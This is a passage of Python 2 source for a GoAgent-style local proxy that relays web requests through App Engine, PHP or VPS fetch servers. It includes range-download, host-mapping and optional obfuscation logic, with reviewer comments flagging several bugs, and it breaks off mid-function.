# gevent is mandatory: monkey-patch the stdlib (sockets, threads, ...) before
# any other network imports. Exit with a hint if gevent is missing.
# NOTE(review): sys.stderr.write returns None on Python 2, so sys.exit(...)
# here exits with status 0 despite being an error path — verify intent.
try:
    __import__('gevent.monkey', fromlist=['.']).patch_all()
except (ImportError, SystemError) as e:
    print "import gevent fail:", e
    sys.exit(sys.stderr.write('please install python-gevent\n'))
import base64
import collections
import ConfigParser
import errno
import httplib
import io
import Queue
import random
import re
import socket
import ssl
import struct
import thread
import threading
import time
import urllib2
import urlparse
import gevent
import OpenSSL
NetWorkIOError = (socket.error, ssl.SSLError, OpenSSL.SSL.Error, OSError)
import logging
from proxylib import AuthFilter
from proxylib import AutoRangeFilter
from proxylib import BaseFetchPlugin
from proxylib import BaseProxyHandlerFilter
from proxylib import BlackholeFilter
from proxylib import CipherFileObject
from proxylib import deflate
from proxylib import DirectFetchPlugin
from proxylib import DirectRegionFilter
from proxylib import dnslib_record2iplist
from proxylib import dnslib_resolve_over_tcp
from proxylib import dnslib_resolve_over_udp
from proxylib import FakeHttpsFilter
from proxylib import ForceHttpsFilter
from proxylib import CRLFSitesFilter
from proxylib import get_dnsserver_list
from proxylib import get_uptime
from proxylib import inflate
from proxylib import LocalProxyServer
from proxylib import message_html
from proxylib import MockFetchPlugin
from proxylib import MultipleConnectionMixin
from proxylib import openssl_set_session_cache_mode
from proxylib import ProxyConnectionMixin
from proxylib import ProxyUtil
from proxylib import RC4Cipher
from proxylib import SimpleProxyHandler
from proxylib import spawn_later
from proxylib import SSLConnection
from proxylib import StaticFileFilter
from proxylib import StripPlugin
from proxylib import StripPluginEx
from proxylib import URLRewriteFilter
from proxylib import UserAgentFilter
from proxylib import XORCipher
import web_control
def is_google_ip(ipaddr):
    """Heuristically decide whether *ipaddr* belongs to Google's IP ranges.

    A handful of addresses inside those ranges are explicitly blacklisted
    and rejected first.
    """
    blacklist = ('74.125.127.102', '74.125.155.102', '74.125.39.102',
                 '74.125.39.113', '209.85.229.138')
    if ipaddr in blacklist:
        return False
    google_prefixes = ('173.194.', '207.126.', '209.85.', '216.239.',
                       '64.18.', '64.233.', '66.102.', '66.249.',
                       '72.14.', '74.125.')
    # str.startswith accepts a tuple, returning a plain bool.
    return ipaddr.startswith(google_prefixes)
class RangeFetch(object):
    """Reassemble a large HTTP response from parallel Range sub-requests.

    Given an initial 206 (partial content) response, this splits the
    remaining byte range into ``maxsize`` chunks, fetches them concurrently
    with ``threads`` worker greenlets via the owning fetch plugin, and
    streams the chunks to the client strictly in order.
    """
    threads = 2                 # number of concurrent fetch workers
    maxsize = 1024*1024*4       # bytes per sub-range request (4 MB)
    bufsize = 8192              # read buffer size per socket read
    waitsize = 1024*512         # used to stagger worker start times
    def __init__(self, handler, plugin, response, fetchservers, **kwargs):
        assert isinstance(plugin, BaseFetchPlugin) and hasattr(plugin, 'fetch')
        self.handler = handler
        self.url = handler.path
        self.plugin = plugin
        self.response = response          # the initial partial response
        self.fetchservers = fetchservers  # candidate upstream fetch servers
        self.kwargs = kwargs
        self._stopped = None              # set truthy to stop all workers
        self._last_app_status = {}        # fetchserver -> last app status
        self.expect_begin = 0             # next byte offset owed to client
    def fetch(self):
        """Send headers to the client, then stream chunks in offset order."""
        response_status = self.response.status
        response_headers = dict((k.title(), v) for k, v in self.response.getheaders())
        content_range = response_headers['Content-Range']
        #content_length = response_headers['Content-Length']
        # Parse "bytes <start>-<end>/<total>" from the initial 206 response.
        start, end, length = tuple(int(x) for x in re.search(r'bytes (\d+)-(\d+)/(\d+)', content_range).group(1, 2, 3))
        if start == 0:
            # Client asked for the whole entity: answer 200 with full length.
            response_status = 200
            response_headers['Content-Length'] = str(length)
            del response_headers['Content-Range']
        else:
            response_headers['Content-Range'] = 'bytes %s-%s/%s' % (start, end, length)
            response_headers['Content-Length'] = str(length-start)
        logging.info('>>>>>>>>>>>>>>> RangeFetch started(%r) %d-%d', self.url, start, end)
        self.handler.send_response(response_status)
        for key, value in response_headers.items():
            self.handler.send_header(key, value)
        self.handler.end_headers()
        # data_queue: (offset, bytes) chunks ordered by offset.
        # range_queue: (start, end, response-or-None) work items for workers;
        # the initial response is reused for the first range.
        data_queue = Queue.PriorityQueue()
        range_queue = Queue.PriorityQueue()
        range_queue.put((start, end, self.response))
        self.expect_begin = start
        for begin in range(end+1, length, self.maxsize):
            range_queue.put((begin, min(begin+self.maxsize-1, length-1), None))
        # Stagger worker start-up so later workers begin slightly delayed.
        for i in xrange(0, self.threads):
            range_delay_size = i * self.maxsize
            spawn_later(float(range_delay_size)/self.waitsize, self.__fetchlet, range_queue, data_queue, range_delay_size)
        has_peek = hasattr(data_queue, 'peek')
        peek_timeout = 120
        # Consume chunks in strict offset order; out-of-order chunks are
        # deferred (peeked or re-queued) until the expected offset arrives.
        while self.expect_begin < length - 1:
            try:
                if has_peek:
                    begin, data = data_queue.peek(timeout=peek_timeout)
                    if self.expect_begin == begin:
                        data_queue.get()
                    elif self.expect_begin < begin:
                        time.sleep(0.1)
                        continue
                    else:
                        logging.error('RangeFetch Error: begin(%r) < expect_begin(%r), quit.', begin, self.expect_begin)
                        break
                else:
                    begin, data = data_queue.get(timeout=peek_timeout)
                    if self.expect_begin == begin:
                        pass
                    elif self.expect_begin < begin:
                        # Not our turn yet: push it back and retry shortly.
                        data_queue.put((begin, data))
                        time.sleep(0.1)
                        continue
                    else:
                        logging.error('RangeFetch Error: begin(%r) < expect_begin(%r), quit.', begin, self.expect_begin)
                        break
            except Queue.Empty:
                logging.error('data_queue peek timeout, break')
                break
            try:
                self.handler.wfile.write(data)
                self.expect_begin += len(data)
                del data
            except Exception as e:
                logging.info('RangeFetch client connection aborted(%s).', e)
                break
        # Signal workers to stop (checked in their loops).
        self._stopped = True
    def __fetchlet(self, range_queue, data_queue, range_delay_size):
        """Worker greenlet: fetch ranges and feed chunks into data_queue.

        Failed or incomplete ranges are re-queued (with response=None) so
        another attempt — possibly via another fetchserver — can retry them.
        """
        headers = dict((k.title(), v) for k, v in self.handler.headers.items())
        headers['Connection'] = 'close'
        while 1:
            try:
                if self._stopped:
                    return
                try:
                    start, end, response = range_queue.get(timeout=1)
                    # Backpressure: if we are far ahead of the client and the
                    # buffered data exceeds ~30MB, defer this range.
                    if self.expect_begin < start and data_queue.qsize() * self.bufsize + range_delay_size > 30*1024*1024:
                        range_queue.put((start, end, response))
                        time.sleep(10)
                        continue
                    headers['Range'] = 'bytes=%d-%d' % (start, end)
                    fetchserver = ''
                    if not response:
                        fetchserver = random.choice(self.fetchservers)
                        # Penalize servers whose last attempt returned >= 500.
                        if self._last_app_status.get(fetchserver, 200) >= 500:
                            time.sleep(5)
                        response = self.plugin.fetch(self.handler, self.handler.command, self.url, headers, self.handler.body, timeout=self.handler.connect_timeout, fetchserver=fetchserver, **self.kwargs)
                except Queue.Empty:
                    continue
                except Exception as e:
                    logging.warning("RangeFetch fetch response %r in __fetchlet", e)
                    range_queue.put((start, end, None))
                    continue
                if not response:
                    logging.warning('RangeFetch %s return %r', headers['Range'], response)
                    range_queue.put((start, end, None))
                    continue
                if fetchserver:
                    self._last_app_status[fetchserver] = response.app_status
                if response.app_status != 200:
                    logging.warning('Range Fetch "%s %s" %s return %s', self.handler.command, self.url, headers['Range'], response.app_status)
                    response.close()
                    range_queue.put((start, end, None))
                    continue
                if response.getheader('Location'):
                    # Follow redirects by updating the shared URL and retrying.
                    self.url = urlparse.urljoin(self.url, response.getheader('Location'))
                    logging.info('RangeFetch Redirect(%r)', self.url)
                    response.close()
                    range_queue.put((start, end, None))
                    continue
                if 200 <= response.status < 300:
                    content_range = response.getheader('Content-Range')
                    if not content_range:
                        logging.warning('RangeFetch "%s %s" return Content-Range=%r: response headers=%r, retry %s-%s', self.handler.command, self.url, content_range, response.getheaders(), start, end)
                        response.close()
                        range_queue.put((start, end, None))
                        continue
                    content_length = int(response.getheader('Content-Length', 0))
                    logging.info('>>>>>>>>>>>>>>> [thread %s] %s %s', threading.currentThread().ident, content_length, content_range)
                    while 1:
                        try:
                            if self._stopped:
                                response.close()
                                return
                            data = None
                            # Bounded read: give up on this read if it stalls.
                            with gevent.Timeout(max(1, self.bufsize//8192), False):
                                data = response.read(self.bufsize)
                            if not data:
                                break
                            data_queue.put((start, data))
                            start += len(data)
                        except Exception as e:
                            logging.warning('RangeFetch "%s %s" %s failed: %s', self.handler.command, self.url, headers['Range'], e)
                            break
                    if start < end + 1:
                        # Short read: re-queue the unread remainder.
                        logging.warning('RangeFetch "%s %s" retry %s-%s', self.handler.command, self.url, start, end)
                        response.close()
                        range_queue.put((start, end, None))
                        continue
                    logging.info('>>>>>>>>>>>>>>> Successfully reached %d bytes.', start - 1)
                else:
                    logging.error('RangeFetch %r return %s', self.url, response.status)
                    response.close()
                    range_queue.put((start, end, None))
                    continue
            except StandardError as e:
                logging.exception('RangeFetch._fetchlet error:%s', e)
                raise
class GAEFetchPlugin(BaseFetchPlugin):
    """Fetch plugin that proxies requests through GAE urlfetch apps.

    Requests are serialized (optionally deflated/obfuscated/RC4-encrypted)
    and POSTed/GET'ed to one of the configured appspot.com applications;
    the wrapped upstream response is then decoded and streamed back.
    """
    connect_timeout = 4   # seconds for upstream connect/read operations
    max_retry = 2         # attempts across appids before giving up
    def __init__(self, appids, password, path, mode, cachesock, keepalive, obfuscate, pagespeed, validate, options, maxsize):
        BaseFetchPlugin.__init__(self)
        self.appids = appids          # rotated on quota/5xx errors
        self.password = password
        self.path = path              # urlfetch endpoint path on the app
        self.mode = mode              # 'http' or 'https' scheme for the app
        self.cachesock = cachesock
        self.keepalive = keepalive
        self.obfuscate = obfuscate
        self.pagespeed = pagespeed
        self.validate = validate
        self.options = options
        self.maxsize = maxsize
    def handle(self, handler, **kwargs):
        """Serve one non-CONNECT request via GAE, retrying across appids."""
        assert handler.command != 'CONNECT'
        method = handler.command
        headers = dict((k.title(), v) for k, v in handler.headers.items())
        body = handler.body
        # Rebuild an absolute URL for origin-form request targets.
        if handler.path[0] == '/':
            url = '%s://%s%s' % (handler.scheme, handler.headers['Host'], handler.path)
        elif handler.path.lower().startswith(('http://', 'https://', 'ftp://')):
            url = handler.path
        else:
            raise ValueError('URLFETCH %r is not a valid url' % handler.path)
        errors = []
        response = None
        for i in xrange(self.max_retry):
            try:
                response = self.fetch(handler, method, url, headers, body, self.connect_timeout)
                if response.app_status < 500:
                    break
                else:
                    if response.app_status == 503:
                        # appid over quota: rotate to the next appid.
                        if len(self.appids) > 1:
                            self.appids.append(self.appids.pop(0))
                            logging.info('gae over qouta, switch next appid=%r', self.appids[0])
                    if i < self.max_retry - 1 and len(self.appids) > 1:
                        self.appids.append(self.appids.pop(0))
                        logging.info('URLFETCH return %d, trying next appid=%r', response.app_status, self.appids[0])
                    response.close()
            except Exception as e:
                errors.append(e)
                logging.info('GAE "%s %s" appid=%r %r, retry...', handler.command, handler.path, self.appids[0], e)
        # NOTE(review): only *raised* exceptions count toward this check, so
        # repeated 5xx responses without exceptions fall through with the
        # last (closed) response — verify this is intended.
        if len(errors) == self.max_retry:
            if response and response.app_status >= 500:
                status = response.app_status
                headers = dict(response.getheaders())
                content = response.read()
                response.close()
            else:
                status = 502
                headers = {'Content-Type': 'text/html'}
                content = message_html('502 URLFetch failed', 'Local URLFetch %r failed' % handler.path, '<br>'.join(repr(x) for x in errors))
            return handler.handler_plugins['mock'].handle(handler, status, headers, content)
        logging.info('%s "GAE %s %s %s" %s %s', handler.address_string(), handler.command, handler.path, handler.protocol_version, response.status, response.getheader('Content-Length', '-'))
        try:
            # Partial content: hand off to RangeFetch for parallel download.
            if response.status == 206:
                fetchservers = ['%s://%s.appspot.com%s' % (self.mode, x, self.path) for x in self.appids]
                return RangeFetch(handler, self, response, fetchservers).fetch()
            handler.close_connection = not response.getheader('Content-Length')
            handler.send_response(response.status)
            for key, value in response.getheaders():
                if key.title() == 'Transfer-Encoding':
                    continue
                handler.send_header(key, value)
            handler.end_headers()
            bufsize = 8192
            while True:
                data = None
                # data stays None (as opposed to b'') only on read timeout.
                with gevent.Timeout(self.connect_timeout, False):
                    data = response.read(bufsize)
                if data is None:
                    logging.warning('response.read(%r) %r timeout', bufsize, url)
                    handler.close_connection = True
                    break
                if data:
                    handler.wfile.write(data)
                if not data:
                    # EOF: release any cached socket before closing.
                    cache_sock = getattr(response, 'cache_sock', None)
                    if cache_sock:
                        cache_sock.close()
                        del response.cache_sock
                    response.close()
                    break
                del data
        except NetWorkIOError as e:
            # Client went away mid-stream; nothing more to do.
            if e[0] in (errno.ECONNABORTED, errno.EPIPE) or 'bad write retry' in repr(e):
                return
    def fetch(self, handler, method, url, headers, body, timeout, **kwargs):
        """Build, send and decode a single wrapped urlfetch request.

        Returns a response object whose ``app_status`` is the GAE app's own
        HTTP status; on success the embedded upstream status line and
        headers are unpacked into the response in place.
        """
        # Compress large-ish bodies when the origin didn't already encode.
        if isinstance(body, basestring) and body:
            if len(body) < 10 * 1024 * 1024 and 'Content-Encoding' not in headers:
                zbody = deflate(body)
                if len(zbody) < len(body):
                    body = zbody
                    headers['Content-Encoding'] = 'deflate'
            headers['Content-Length'] = str(len(body))
        # GAE donot allow set `Host` header
        if 'Host' in headers:
            del headers['Host']
        # NOTE(review): this rebinding discards any caller-supplied kwargs
        # (e.g. fetchserver= passed by RangeFetch), so kwargs.get('fetchserver')
        # below is always None — looks unintentional, verify upstream.
        kwargs = {}
        if self.password:
            kwargs['password'] = self.password
        if self.options:
            kwargs['options'] = self.options
        if self.validate:
            kwargs['validate'] = self.validate
        if self.maxsize:
            kwargs['maxsize'] = self.maxsize
        # Serialize the original request line + headers + X-URLFETCH options.
        payload = '%s %s %s\r\n' % (method, url, handler.request_version)
        payload += ''.join('%s: %s\r\n' % (k, v) for k, v in headers.items() if k not in handler.skip_headers)
        payload += ''.join('X-URLFETCH-%s: %s\r\n' % (k, v) for k, v in kwargs.items() if v)
        # prepare GAE request
        request_method = 'POST'
        # Spread Range sub-requests across appids; plain requests use appid 0.
        fetchserver_index = random.randint(0, len(self.appids)-1) if 'Range' in headers else 0
        fetchserver = kwargs.get('fetchserver') or '%s://%s.appspot.com%s' % (self.mode, self.appids[fetchserver_index], self.path)
        request_headers = {}
        if common.GAE_OBFUSCATE:
            # Disguise the request as a GET for a .gif; payload/body travel
            # base64-deflated in custom headers instead of the body.
            request_method = 'GET'
            fetchserver += 'ps/%d%s.gif' % (int(time.time()*1000), random.random())
            request_headers['X-URLFETCH-PS1'] = base64.b64encode(deflate(payload)).strip()
            if body:
                request_headers['X-URLFETCH-PS2'] = base64.b64encode(deflate(body)).strip()
                body = ''
            if common.GAE_PAGESPEED:
                fetchserver = re.sub(r'^(\w+://)', r'\g<1>1-ps.googleusercontent.com/h/', fetchserver)
        else:
            # Binary framing: 2-byte big-endian payload length + payload + body.
            payload = deflate(payload)
            body = '%s%s%s' % (struct.pack('!h', len(payload)), payload, body)
            if 'rc4' in common.GAE_OPTIONS:
                request_headers['X-URLFETCH-Options'] = 'rc4'
                body = RC4Cipher(kwargs.get('password')).encrypt(body)
        request_headers['Content-Length'] = str(len(body))
        # post data
        need_crlf = 0 if common.GAE_MODE == 'https' else 1
        need_validate = common.GAE_VALIDATE
        cache_key = '%s:%d' % (common.HOST_POSTFIX_MAP['.appspot.com'], 443 if common.GAE_MODE == 'https' else 80)
        headfirst = bool(common.GAE_HEADFIRST)
        response = handler.create_http_request(request_method, fetchserver, request_headers, body, timeout, crlf=need_crlf, validate=need_validate, cache_key=cache_key, headfirst=headfirst)
        response.app_status = response.status
        if response.app_status != 200:
            return response
        # Decrypt the wrapped stream if RC4 was negotiated above.
        if 'rc4' in request_headers.get('X-URLFETCH-Options', ''):
            response.fp = CipherFileObject(response.fp, RC4Cipher(kwargs['password']))
        # Unwrap: 2-byte length, then deflated "status line\r\nheaders".
        data = response.read(2)
        if len(data) < 2:
            response.status = 502
            response.fp = io.BytesIO(b'connection aborted. too short leadbyte data=' + data)
            response.read = response.fp.read
            return response
        headers_length, = struct.unpack('!h', data)
        data = response.read(headers_length)
        if len(data) < headers_length:
            response.status = 502
            response.fp = io.BytesIO(b'connection aborted. too short headers data=' + data)
            response.read = response.fp.read
            return response
        raw_response_line, headers_data = inflate(data).split('\r\n', 1)
        _, response.status, response.reason = raw_response_line.split(None, 2)
        response.status = int(response.status)
        response.reason = response.reason.strip()
        response.msg = httplib.HTTPMessage(io.BytesIO(headers_data))
        return response
class PHPFetchPlugin(BaseFetchPlugin):
    """Fetch plugin that proxies requests through remote PHP fetch servers.

    The original request is serialized (deflated request line + headers,
    2-byte length prefix) and POSTed to a PHP endpoint; the reply is
    optionally XOR-decrypted and streamed back to the client.
    """
    connect_timeout = 4   # seconds for the upstream POST
    def __init__(self, fetchservers, password, validate):
        BaseFetchPlugin.__init__(self)
        self.fetchservers = fetchservers
        self.password = password
        self.validate = validate
    def handle(self, handler, **kwargs):
        """Serialize the request, POST it to a PHP server, relay the reply."""
        method = handler.command
        url = handler.path
        headers = dict((k.title(), v) for k, v in handler.headers.items())
        body = handler.body
        # Compress large-ish bodies when the origin didn't already encode.
        if body:
            if len(body) < 10 * 1024 * 1024 and 'Content-Encoding' not in headers:
                zbody = deflate(body)
                if len(zbody) < len(body):
                    body = zbody
                    headers['Content-Encoding'] = 'deflate'
            headers['Content-Length'] = str(len(body))
        # NOTE(review): this local is never used afterwards (the generator
        # below reads handler.skip_headers directly) — candidate for removal.
        skip_headers = handler.skip_headers
        if self.password:
            kwargs['password'] = self.password
        if self.validate:
            kwargs['validate'] = self.validate
        payload = '%s %s %s\r\n' % (method, url, handler.request_version)
        payload += ''.join('%s: %s\r\n' % (k, v) for k, v in headers.items() if k not in handler.skip_headers)
        payload += ''.join('X-URLFETCH-%s: %s\r\n' % (k, v) for k, v in kwargs.items() if v)
        payload = deflate(payload)
        # 2-byte big-endian payload length + payload + body (extra parens
        # around the tuple are redundant but harmless).
        body = '%s%s%s' % ((struct.pack('!h', len(payload)), payload, body))
        request_headers = {'Content-Length': len(body), 'Content-Type': 'application/octet-stream'}
        # Spread Range requests across servers; plain requests use server 0.
        fetchserver_index = 0 if 'Range' not in headers else random.randint(0, len(self.fetchservers)-1)
        # Random query string defeats intermediary caches.
        fetchserver = '%s?%s' % (self.fetchservers[fetchserver_index], random.random())
        crlf = 0
        # NOTE(review): '%s//:%s' looks like a typo of '%s://%s'; it is only
        # used as an opaque cache key, so it is consistent but worth fixing.
        cache_key = '%s//:%s' % urlparse.urlsplit(fetchserver)[:2]
        try:
            response = handler.create_http_request('POST', fetchserver, request_headers, body, self.connect_timeout, crlf=crlf, cache_key=cache_key)
        except Exception as e:
            logging.warning('%s "%s" failed %r', method, url, e)
            return
        response.app_status = response.status
        # Successful encrypted replies are disguised as image/gif.
        need_decrypt = self.password and response.app_status == 200 and response.getheader('Content-Type', '') == 'image/gif' and response.fp
        if need_decrypt:
            response.fp = CipherFileObject(response.fp, XORCipher(self.password[0]))
        logging.info('%s "PHP %s %s %s" %s %s', handler.address_string(), handler.command, url, handler.protocol_version, response.status, response.getheader('Content-Length', '-'))
        handler.close_connection = bool(response.getheader('Transfer-Encoding'))
        # Relay the (possibly decrypted) body to the client in 8 KB chunks.
        while True:
            data = response.read(8192)
            if not data:
                break
            handler.wfile.write(data)
            del data
class VPSFetchPlugin(BaseFetchPlugin):
    """Fetch plugin that relays requests through personal VPS servers.

    NOTE: this plugin is incomplete — handle_connect is a stub and
    handle_method stops right after issuing the upstream request (#TODO).
    """
    connect_timeout = 4   # seconds for the upstream request
    def __init__(self, fetchservers, username, password):
        BaseFetchPlugin.__init__(self)
        self.fetchservers = fetchservers
        self.username = username
        self.password = password
        self.fake_headers = {}   # last set of disguised headers sent upstream
    def handle(self, handler, **kwargs):
        """Dispatch CONNECT vs. ordinary methods to the dedicated handlers."""
        if handler.command == 'CONNECT':
            return self.handle_connect(handler, **kwargs)
        else:
            return self.handle_method(handler, **kwargs)
    def handle_connect(self, handler, **kwargs):
        # Stub: CONNECT tunneling via VPS is not implemented yet.
        return
    def handle_method(self, handler, **kwargs):
        """Forward a non-CONNECT request to a random VPS (incomplete)."""
        # NOTE(review): `method` and `x_headers` are computed but never used
        # beyond this point — presumably meant for the unfinished relay code.
        method = handler.command
        url = handler.path
        headers = dict((k.title(), v) for k, v in handler.headers.items() if k.title() not in handler.skip_headers)
        x_headers = {}
        # Move identifying headers aside and disguise the Host header.
        if 'Host' in headers:
            x_headers['Host'] = headers.pop('Host')
        if 'Cookie' in headers:
            x_headers['Cookie'] = headers.pop('Cookie')
        headers['Host'] = 'www.%s.com' % self.username
        self.fake_headers = headers.copy()
        fetchserver = random.choice(self.fetchservers)
        response = handler.create_http_request(handler.command, fetchserver, headers, handler.body, self.connect_timeout)
        if not response:
            raise socket.error(errno.ECONNRESET, 'urlfetch %r return None' % url)
        #TODO
class HostsFilter(BaseProxyHandlerFilter):
    """Filter mapping hosts/hostports/URL regexes to direct-fetch IP lists.

    Lookup precedence in both methods: exact host, host postfix, exact
    host:port, host:port postfix, then (non-CONNECT only) URL regex.
    Postfix matches are memoized back into the exact maps by filter().
    """
    def __init__(self, iplist_map, host_map, host_postfix_map, hostport_map, hostport_postfix_map, urlre_map):
        self.iplist_map = iplist_map                  # alias -> list of IPs
        self.host_map = host_map                      # exact hostname -> alias
        self.host_postfix_map = host_postfix_map      # hostname suffix -> alias
        self.host_postfix_endswith = tuple(host_postfix_map)
        self.hostport_map = hostport_map              # "host:port" -> alias
        self.hostport_postfix_map = hostport_postfix_map
        self.hostport_postfix_endswith = tuple(hostport_postfix_map)
        self.urlre_map = urlre_map                    # compiled-regex -> alias
    def gethostbyname2(self, handler, hostname):
        """Resolve *hostname* through the configured maps.

        Returns a list of IPs (from iplist_map, or by splitting the alias on
        '|'), or None when unmapped or explicitly mapped to 'direct'.
        """
        hostport = '%s:%d' % (hostname, handler.port)
        hosts = ''
        if hostname in self.host_map:
            hosts = self.host_map[hostname]
        elif hostname.endswith(self.host_postfix_endswith):
            hosts = next(self.host_postfix_map[x] for x in self.host_postfix_map if hostname.endswith(x))
        # host:port entries override plain-host matches.
        if hostport in self.hostport_map:
            hosts = self.hostport_map[hostport]
        elif hostport.endswith(self.hostport_postfix_endswith):
            hosts = next(self.hostport_postfix_map[x] for x in self.hostport_postfix_map if hostport.endswith(x))
        # URL regex rules apply only to requests that carry a URL path.
        if handler.command != 'CONNECT' and self.urlre_map:
            try:
                hosts = next(self.urlre_map[x] for x in self.urlre_map if x(handler.path))
            except StopIteration:
                pass
        if hosts not in ('', 'direct'):
            return self.iplist_map.get(hosts) or hosts.split('|')
        return None
    def filter(self, handler):
        """Return ('direct', kwargs) for mapped hosts; None to fall through."""
        host, port = handler.host, handler.port
        hostport = handler.path if handler.command == 'CONNECT' else '%s:%d' % (host, port)
        # Google hosts get the head-first connection strategy.
        headfirst = '.google' in host
        if host in self.host_map:
            return 'direct', {'cache_key': '%s:%d' % (self.host_map[host], port), 'headfirst': headfirst}
        elif host.endswith(self.host_postfix_endswith):
            # Memoize the postfix hit as an exact entry for next time.
            self.host_map[host] = next(self.host_postfix_map[x] for x in self.host_postfix_map if host.endswith(x))
            return 'direct', {'cache_key': '%s:%d' % (self.host_map[host], port), 'headfirst': headfirst}
        elif hostport in self.hostport_map:
            return 'direct', {'cache_key': '%s:%d' % (self.hostport_map[hostport], port), 'headfirst': headfirst}
        elif hostport.endswith(self.hostport_postfix_endswith):
            self.hostport_map[hostport] = next(self.hostport_postfix_map[x] for x in self.hostport_postfix_map if hostport.endswith(x))
            return 'direct', {'cache_key': '%s:%d' % (self.hostport_map[hostport], port), 'headfirst': headfirst}
        if handler.command != 'CONNECT' and self.urlre_map and any(x(handler.path) for x in self.urlre_map):
            return 'direct', {'headfirst': headfirst}
class GAEFetchFilter(BaseProxyHandlerFilter):
    """Default filter: dispatch requests to the GAE fetch plugin.

    CONNECT tunnels are stripped (locally terminated TLS); urlfetch-capable
    methods go to 'gae'; anything else falls back to 'php' when that plugin
    is installed, otherwise to a logged 'direct' fetch.
    """
    #https://github.com/AppScale/gae_sdk/blob/master/google/appengine/api/taskqueue/taskqueue.py#L241
    MAX_URL_LENGTH = 2083
    def filter(self, handler):
        """https://developers.google.com/appengine/docs/python/urlfetch/"""
        command = handler.command
        if command == 'CONNECT':
            # only handshake on ports where TLS is plausible
            handshake = 440 <= handler.port <= 450 or 1024 <= handler.port <= 65535
            return 'strip', {'do_ssl_handshake': handshake}
        if command in ('GET', 'POST', 'HEAD', 'PUT', 'DELETE', 'PATCH'):
            # the methods GAE urlfetch supports
            return 'gae', {}
        if 'php' in handler.handler_plugins:
            return 'php', {}
        logging.warning('"%s %s" not supported by GAE, please enable PHP mode!', command, handler.path)
        return 'direct', {}
class WithGAEFilter(BaseProxyHandlerFilter):
    """withgae/withphp/withvps filter

    Sites starting with '.' are treated as domain suffixes; all others as
    exact hostnames.  Matching priority is gae, then php, then vps.
    """
    def __init__(self, withgae_sites, withphp_sites, withvps_sites):
        def split(sites):
            # (exact hostnames, ('.suffix', ...)) partition of the site list
            return (set(s for s in sites if not s.startswith('.')),
                    tuple(s for s in sites if s.startswith('.')))
        self.withgae_sites, self.withgae_sites_postfix = split(withgae_sites)
        self.withphp_sites, self.withphp_sites_postfix = split(withphp_sites)
        self.withvps_sites, self.withvps_sites_postfix = split(withvps_sites)
    def filter(self, handler):
        """Return a plugin dispatch for matching hosts, else None."""
        host = handler.host
        for plugin, exact, postfix in (('gae', self.withgae_sites, self.withgae_sites_postfix),
                                       ('php', self.withphp_sites, self.withphp_sites_postfix),
                                       ('vps', self.withvps_sites, self.withvps_sites_postfix)):
            if host in exact or host.endswith(postfix):
                if handler.command == 'CONNECT':
                    # terminate TLS locally so the plugin sees plain requests
                    do_ssl_handshake = 440 <= handler.port <= 450 or 1024 <= handler.port <= 65535
                    return 'strip', {'do_ssl_handshake': do_ssl_handshake}
                return plugin, {}
class GAEProxyHandler(MultipleConnectionMixin, SimpleProxyHandler):
    """GAE Proxy Handler"""
    # default filter chain; pre_start() inserts further filters at index 0
    handler_filters = [GAEFetchFilter()]
    handler_plugins = {'direct': DirectFetchPlugin(),
                       'mock': MockFetchPlugin(),
                       'strip': StripPlugin(),}
    # set once in first_run() to the installed HostsFilter instance, if any
    hosts_filter = None
    def __init__(self, *args, **kwargs):
        SimpleProxyHandler.__init__(self, *args, **kwargs)
    def first_run(self):
        """GAEProxyHandler setup, init domain/iplist map"""
        openssl_set_session_cache_mode(self.openssl_context, 'client')
        if not common.PROXY_ENABLE:
            # only resolve iplists when connecting directly (no upstream proxy)
            logging.info('resolve common.IPLIST_MAP names=%s to iplist', list(common.IPLIST_MAP))
            common.resolve_iplist()
        # shuffle so load spreads across the configured appids
        random.shuffle(common.GAE_APPIDS)
        self.__class__.handler_plugins['gae'] = GAEFetchPlugin(common.GAE_APPIDS, common.GAE_PASSWORD, common.GAE_PATH, common.GAE_MODE, common.GAE_CACHESOCK, common.GAE_KEEPALIVE, common.GAE_OBFUSCATE, common.GAE_PAGESPEED, common.GAE_VALIDATE, common.GAE_OPTIONS, common.GAE_MAXSIZE)
        try:
            # cache the HostsFilter so gethostbyname2 can consult it cheaply
            self.__class__.hosts_filter = next(x for x in self.__class__.handler_filters if isinstance(x, HostsFilter))
        except StopIteration:
            pass
    def gethostbyname2(self, hostname):
        # prefer hosts-filter mappings; fall back to normal resolution
        iplist = self.hosts_filter.gethostbyname2(self, hostname) if self.hosts_filter else None
        return iplist or MultipleConnectionMixin.gethostbyname2(self, hostname)
class ProxyGAEProxyHandler(ProxyConnectionMixin, GAEProxyHandler):
    """GAEProxyHandler variant that tunnels through an upstream proxy."""
    def __init__(self, *args, **kwargs):
        # PROXY_PASSWROD spelling matches the attribute defined on Common
        ProxyConnectionMixin.__init__(self, common.PROXY_HOST, common.PROXY_PORT, common.PROXY_USERNAME, common.PROXY_PASSWROD)
        GAEProxyHandler.__init__(self, *args, **kwargs)
    def gethostbyname2(self, hostname):
        """Resolve GAE/GCS hostnames locally; defer everything else to the proxy."""
        for suffix in ('.appspot.com', '.googleusercontent.com'):
            if not hostname.endswith(suffix):
                continue
            alias = common.HOST_MAP.get(hostname) or common.HOST_POSTFIX_MAP.get(suffix) or 'www.google.com'
            return common.IPLIST_MAP.get(alias) or alias.split('|')
        return ProxyConnectionMixin.gethostbyname2(self, hostname)
class PHPFetchFilter(BaseProxyHandlerFilter):
    """php fetch filter: strip CONNECT tunnels, send everything else to 'php'."""
    def filter(self, handler):
        return ('strip', {}) if handler.command == 'CONNECT' else ('php', {})
class VPSFetchFilter(BaseProxyHandlerFilter):
    """vps fetch filter: unconditionally dispatch every request to 'vps'."""
    def filter(self, handler):
        # no stripping, no fallback — the vps plugin handles all methods
        return 'vps', {}
class PHPProxyHandler(MultipleConnectionMixin, SimpleProxyHandler):
    """PHP Proxy Handler"""
    # PHPFetchFilter routes everything to 'php'; the 'php' plugin itself is
    # installed later (see main(), which sets handler_plugins['php'])
    handler_filters = [PHPFetchFilter()]
    handler_plugins = {'direct': DirectFetchPlugin(),
                       'mock': MockFetchPlugin(),
                       'strip': StripPlugin(),}
    def __init__(self, *args, **kwargs):
        SimpleProxyHandler.__init__(self, *args, **kwargs)
class ProxyPHPProxyHandler(ProxyConnectionMixin, PHPProxyHandler):
    """PHPProxyHandler variant that tunnels through an upstream proxy."""
    def __init__(self, *args, **kwargs):
        # PROXY_PASSWROD spelling matches the attribute defined on Common
        ProxyConnectionMixin.__init__(self, common.PROXY_HOST, common.PROXY_PORT, common.PROXY_USERNAME, common.PROXY_PASSWROD)
        PHPProxyHandler.__init__(self, *args, **kwargs)
    def gethostbyname2(self, hostname):
